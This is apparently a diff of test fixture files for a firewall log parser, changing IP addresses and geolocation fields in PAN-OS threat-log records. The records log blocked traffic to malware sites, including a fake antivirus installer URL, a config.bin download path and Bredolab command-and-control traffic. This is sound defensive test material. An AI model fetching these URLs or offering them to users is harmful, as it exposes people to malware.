 "network.community_id": "1:8JiI5Ka3Oyz6yaLm3xObTqAo/Jw=",
 "network.direction": "inbound",
@@ -3763,13 +3596,6 @@
 "client.port": 59238,
 "client.user.name": "crusher",
 "destination.address": "208.73.210.29",
- "destination.as.number": 40034,
- "destination.as.organization.name": "Confluence Networks Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "208.73.210.29",
 "destination.port": 80,
@@ -3793,7 +3619,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 15712,
+ "log.offset": 15646,
 "network.application": "web-browsing",
 "network.community_id": "1:lOdKYo+aMIHRMMJPawuXy8Bk2I0=",
 "network.direction": "inbound",
@@ -3859,19 +3685,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59010,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -3882,7 +3704,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -3893,9 +3715,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 16111,
+ "log.offset": 16045,
 "network.application": "web-browsing",
- "network.community_id": "1:rDRkkTH2aHta89i52OraqG5WcDI=",
+ "network.community_id": "1:BIi+zGCJFQAQO2X3hzjLtYZCMxg=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -3930,13 +3752,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -3960,13 +3782,6 @@
 "client.port": 58969,
 "client.user.name": "crusher",
 "destination.address": "208.73.210.29",
- "destination.as.number": 40034,
- "destination.as.organization.name": "Confluence Networks Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "208.73.210.29",
 "destination.port": 80,
@@ -3990,7 +3805,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 16508,
+ "log.offset": 16440,
 "network.application": "web-browsing",
 "network.community_id": "1:00fHGTkjtblnJQ9P4Wiw9QuDEpI=",
 "network.direction": "inbound",
@@ -4058,13 +3873,6 @@
 "client.port": 58941,
 "client.user.name": "crusher",
 "destination.address": "89.108.64.156",
- "destination.as.number": 197695,
- "destination.as.organization.name": "Domain names registrar REG.RU, Ltd",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7386,
- "destination.geo.location.lon": 37.6068,
 "destination.geo.name": "Russian Federation",
 "destination.ip": "89.108.64.156",
 "destination.port": 80,
@@ -4088,7 +3896,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 16912,
+ "log.offset": 16844,
 "network.application": "web-browsing",
 "network.community_id": "1:sQ6YL9T0OZftMg71BK+1IHpXIRM=",
 "network.direction": "inbound",
@@ -4155,13 +3963,6 @@
 "client.port": 58942,
 "client.user.name": "crusher",
 "destination.address": "89.108.64.156",
- "destination.as.number": 197695,
- "destination.as.organization.name": "Domain names registrar REG.RU, Ltd",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7386,
- "destination.geo.location.lon": 37.6068,
 "destination.geo.name": "Russian Federation",
 "destination.ip": "89.108.64.156",
 "destination.port": 80,
@@ -4185,7 +3986,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 17318,
+ "log.offset": 17250,
 "network.application": "web-browsing",
 "network.community_id": "1:a3rlKRtYt43mps+uHBznJUtG3Qg=",
 "network.direction": "inbound",
@@ -4248,7 +4049,7 @@
 },
 {
 "@timestamp": "2012-04-10T04:37:28.000-02:00",
- "client.ip": "204.232.231.46",
+ "client.ip": "67.43.156.12",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -4264,7 +4065,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 1,
 "event.timezone": "-02:00",
@@ -4274,9 +4075,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "critical",
- "log.offset": 17726,
+ "log.offset": 17658,
 "network.application": "web-browsing",
- "network.community_id": "1:gfZAOGdC3xAoPZCFZCwHJJ7Iin4=",
+ "network.community_id": "1:lNN8d/0xZVYU/1cwpZQKW1N2/Kw=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -4308,7 +4109,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
@@ -4318,19 +4119,15 @@
 "server.port": 58849,
 "server.user.name": "crusher",
 "service.type": "panw",
- "source.address": "204.232.231.46",
- "source.as.number": 27357,
- "source.as.organization.name": "Rackspace Hosting",
- "source.geo.city_name": "Fort Lauderdale",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 26.1792,
- "source.geo.location.lon": -80.1749,
+ "source.address": "67.43.156.12",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
 "source.geo.name": "United States",
- "source.geo.region_iso_code": "US-FL",
- "source.geo.region_name": "Florida",
- "source.ip": "204.232.231.46",
+ "source.ip": "67.43.156.12",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -4343,17 +4140,7 @@
 "client.port": 58856,
 "client.user.name": "crusher",
 "destination.address": "216.8.179.25",
- "destination.as.number": 13727,
- "destination.as.organization.name": "NEXT DIMENSION INC",
- "destination.geo.city_name": "Kitchener",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "CA",
- "destination.geo.country_name": "Canada",
- "destination.geo.location.lat": 43.4419,
- "destination.geo.location.lon": -80.4216,
 "destination.geo.name": "Canada",
- "destination.geo.region_iso_code": "CA-ON",
- "destination.geo.region_name": "Ontario",
 "destination.ip": "216.8.179.25",
 "destination.port": 80,
 "event.action": "url_filtering",
@@ -4376,7 +4163,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 18156,
+ "log.offset": 18086,
 "network.application": "web-browsing",
 "network.community_id": "1:VeoAydUSFUdh8ZddIqbsMY32sBU=",
 "network.direction": "inbound",
@@ -4442,13 +4229,6 @@
 "client.port": 58847,
 "client.user.name": "crusher",
 "destination.address": "69.43.161.154",
- "destination.as.number": 22489,
- "destination.as.organization.name": "Castle Access Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "69.43.161.154",
 "destination.port": 80,
@@ -4472,7 +4252,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 18539,
+ "log.offset": 18469,
 "network.application": "web-browsing",
 "network.community_id": "1:ZsFVG8FJVifp8WmzI9Zj/lo+dB4=",
 "network.direction": "inbound",
@@ -4538,13 +4318,6 @@
 "client.port": 58841,
 "client.user.name": "crusher",
 "destination.address": "208.91.196.252",
- "destination.as.number": 40034,
- "destination.as.organization.name": "Confluence Networks Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "VG",
- "destination.geo.country_name": "British Virgin Islands",
- "destination.geo.location.lat": 18.5,
- "destination.geo.location.lon": -64.5,
 "destination.geo.name": "Virgin Islands British",
 "destination.ip": "208.91.196.252",
 "destination.port": 80,
@@ -4568,7 +4341,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 18937,
+ "log.offset": 18867,
 "network.application": "web-browsing",
 "network.community_id": "1:NAfQ33YdKJSvbcxpFK8HIhI39lk=",
 "network.direction": "inbound",
@@ -4635,13 +4408,6 @@
 "client.port": 58795,
 "client.user.name": "crusher",
 "destination.address": "208.73.210.29",
- "destination.as.number": 40034,
- "destination.as.organization.name": "Confluence Networks Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "208.73.210.29",
 "destination.port": 80,
@@ -4665,7 +4431,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 19373,
+ "log.offset": 19303,
 "network.application": "web-browsing",
 "network.community_id": "1:AMcTUl91PN0z8TJr2QwdEOP+Fmo=",
 "network.direction": "inbound",
@@ -4730,19 +4496,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 58753,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -4753,7 +4515,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -4764,9 +4526,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 19768,
+ "log.offset": 19698,
 "network.application": "web-browsing",
- "network.community_id": "1:7Tdwe73AJMSdJL4hxpQDyl5Lwn4=",
+ "network.community_id": "1:CpDZD/LwAie+2cyW3u2iJOZv/v8=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -4801,13 +4563,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -4829,19 +4591,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 58708,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -4852,7 +4610,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -4863,9 +4621,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 20162,
+ "log.offset": 20090,
 "network.application": "web-browsing",
- "network.community_id": "1:q7ERSuCoAPSiI8xLXZCI+1M9B8I=",
+ "network.community_id": "1:9p9ImUje+ZnX1LilJHp0t55PXRA=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -4900,13 +4658,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -4929,19 +4687,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 58707,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -4952,7 +4706,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -4963,9 +4717,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 20599,
+ "log.offset": 20525,
 "network.application": "web-browsing",
- "network.community_id": "1:AsPpOgQhhKdBtPhY4zahdBuNcTc=",
+ "network.community_id": "1:oSBh7/+acg+e1389qxJ4iY7HeRA=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -5000,13 +4754,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -5029,19 +4783,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 58603,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -5052,7 +4802,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -5063,9 +4813,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 21043,
+ "log.offset": 20967,
 "network.application": "web-browsing",
- "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=",
+ "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -5100,13 +4850,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -5129,19 +4879,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 58603,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -5152,7 +4898,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "event.original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -5163,9 +4909,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 21451, + "log.offset": 21373, "network.application": "web-browsing", - "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5200,13 +4946,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -5226,7 +4972,7 @@ }, { "@timestamp": "2012-04-10T04:19:59.000-02:00", - "client.ip": "173.236.179.57", + "client.ip": "89.160.20.112", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", @@ -5242,7 +4988,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -5255,9 +5001,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 21859, + "log.offset": 21779, "network.application": "web-browsing", - "network.community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=", + "network.community_id": "1:53oYZBFsaxzIKiLZtutnXPu7S8M=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5288,8 +5034,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "173.236.179.57", - "192.168.0.2" + "192.168.0.2", + "89.160.20.112" ], "related.user": [ "crusher" 
